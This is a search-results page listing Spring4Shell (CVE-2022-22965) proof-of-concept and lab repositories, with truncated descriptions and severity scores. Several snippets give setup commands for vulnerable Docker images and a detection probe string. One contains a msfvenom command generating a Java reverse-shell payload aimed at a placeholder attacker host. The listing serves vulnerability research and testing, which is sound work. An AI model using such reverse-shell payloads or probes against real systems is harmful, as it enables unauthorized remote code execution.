Lucene search
+L

198 matches found

Kitploit
Kitploit
added 2026/09/09 8:15 a.m.14 views

Spring4Shell-POC

Spring4Shell-POC CVE-2022-22965 Spring4Shell CVE-2022-22965 Proof Of Concept/Information + A vulnerable Tomcat server with a vulnerable spring4shell application. Early this morning, multiple sources has informed of a possible RCE exploit in the popular java framework spring. The naming of this fl...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/09 7:14 a.m.4 views

Fast-CVE-2022-22965

Máquina objetivo root@kitploit: docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest El núcleo del shell inverso se refiere a msfvenom root@kitploit: msfvenom -p java/jspshellreversetcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp Después de codificar el JSP en URL, use root@kitploit:...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 6:19 a.m.5 views

Spring4Shell-POC

Spring4Shell PoC Application This is a dockerized application that is vulnerable to the Spring4Shell vulnerability CVE-2022-22965. Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded by Tomcat...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/09 4:22 a.m.7 views

Spring4Shell

Spring4Shell En este desafío, analicé la vulnerabilidad Spring4Shell CVE-2022-22965, investigué evasiones de seguridad y redacté un Informe de Análisis Post-Mortem del Incidente detallando la detección, el impacto y la resolución del ataque. También implementé una regla de firewall en Python para...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 3:31 a.m.4 views

SSE4-CVE-2022-22965

Spring Boot CVE-2022-22965 Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5 Getting Started 1. Run docker compose up --build to build and start the vulnerable application. 2. Run curl -H "Accept: text/html;"...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 2:55 a.m.5 views

spring4shell-local-verification-lab

Spring4Shell Local Impact Condition Verification, Remediation, and Re-testing Project Project Introduction This project is used for learning and verifying the impact conditions, risk manifestations, remediation methods, and post-remediation re-testing procedures for Spring Framework CVE-2022-2296...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 2:30 a.m.6 views

cve-2022-22965

Spring4Shell - CVE-2022-22965 Build let's clone the repository, build and run the container root@kitploit: $ git clone https://github.com/twseptian/cve-2022-22965.git $ cd cve-2022-22965 $ docker build . -t spring4shell-poc $ docker run -p 8080:8080 --name spring4shell-poc spring4shell-poc check...

9.8CVSS7.6AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 2:29 a.m.5 views

spring-framework-rce

spring-framework-rce CVE-2022-22965 Requirements 1. tomcat8 8 Usage 1. Download springframeworkrce-0.0.1-SNAPSHOT.zip, unzip, and rename to ROOT.war. 2. Replace the ROOT folder or ROOT.war in the webapps folder of tomcat. 3. Switch to the bin directory of tomcat and run .\catalina.bat run. Testin...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/09 1:18 a.m.7 views

CVE-2022-22965

CVE-2022-22965 2022.04.02 16:44 Optimized POC, no longer a one-time validation Warning: This program will destroy log information integrity, please back up server data! Use only if you have server penetration test authorization! pocsuite -r CVE-2022-22965POCEXP.py -u url As shown below, the progr...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 1:17 a.m.3 views

SpringFramework_CVE-2022-22965_RCE

SpringFrameworkCVE-2022-22965RCE Vulnerabilidad de ejecución remota de código en SpringFramework CVE-2022-22965 Entorno de reproducción de la vulnerabilidad root@kitploit: docker pull vulfocus/spring-core-rce-2022-03-29 docker run -d -p 8090:8080 --name springrce -it...

9.8CVSS7.6AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 12:58 a.m.5 views

CVE-2022-22965

Spring Framework Remote Code Execution Vulnerability CVE-2022-22965 Analysis Code Analysis on BiliBili:https://www.bilibili.com/video/BV1jY4y1H7EC...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/09 12:13 a.m.6 views

Spring4ShellPoC

Spring4ShellPoC Spring4Shell PoC CVE-2022-22965 Just playing with the exploit. Modified from the good work done by BobTheShopLifter, https://github.com/BobTheShoplifter/Spring4Shell-POC and TryHackMe, https://tryhackme.com/room/spring4shell Just a few tweaks. Added a some extra bits when checking...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/08 11:10 p.m.4 views

CVE-2022-22965-spring4shell

CVE-2022-22965-spring4shell CVE-2022-22965 Spring4Shell research & PoC for learning purposes Blog post A more detailed analysis and explanation of the vulnerability can be found on my blog post. Comments on initial research Based on the initial research I did on...

9.8CVSS7.6AI score0.99638EPSS
SaveExploits105References1
Kitploit
Kitploit
added 2026/09/08 10:26 p.m.7 views

SpringFramework_CVE-2022-22965_RCE

SpringFrameworkCVE-2022-22965RCE Vulnerabilidad de ejecución remota de código en SpringFramework CVE-2022-22965 Entorno de reproducción de la vulnerabilidad root@kitploit: docker pull vulfocus/spring-core-rce-2022-03-29 docker run -d -p 8090:8080 --name springrce -it...

9.8CVSS7.6AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/08 8:58 p.m.5 views

Spring4shell-CVE-2022-22965-POC

Spring4shell RCE vulnerability This vulnerability affects Spring Core and allows an attacker to send a specially crafted HTTP request to bypass protections in the library’s HTTP request parser, leading to remote code execution. More info Here In order for this vulnerability to be exploited, sever...

9.8CVSS7.6AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/08 8:19 p.m.6 views

CVE-2022-22965_PoC

This repository does not have a README...

9.8CVSS7.4AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/08 8:10 p.m.4 views

spring-shell-vuln

spring-shell-vuln Spring4Shell: Spring core RCE vulnerability Spring has Confirmed the RCE in Spring Framework. The team has just published the statement along with the mitigation guides for the issue. Now, this vulnerability can be tracked as CVE-2022-22965. Some information about the Spring4She...

9.8CVSS8.4AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/08 8:04 p.m.7 views

CVE-2022-22965

Spring4Shell-PoC Application This application has been containerized and is susceptible to the Spring4Shell flaw CVE-2022-22965. The war's complete Java source is available and changeable; it may be rebuilt each time the docker image is created. Tomcat will then start loading the created WAR. Thi...

9.8CVSS7.5AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
added 2026/09/08 8:03 p.m.9 views

CVE-2022-22965

CVE-2022-22965 Spring Framework RCE CVE-2022-22965 Nmap NSE Checker Non-Intrusive This script looks the existence of CVE-2022-22965 Spring Framework 5.2.x / 5.3.x RCE uses a payload "/?class.module.classLoader.definedPackages%5B0%5D=0" through a GET request looking 400 code as response NON...

9.8CVSS7.8AI score0.99638EPSS
SaveExploits105References3
Kitploit
Kitploit
added 2026/09/08 7:51 p.m.6 views

Spring4Shell-CVE-2022-22965-Exploitation-Attempt

Este repositorio no tiene un README...

9.8CVSS7.4AI score0.99638EPSS
SaveExploits105
Rows per page
Query Builder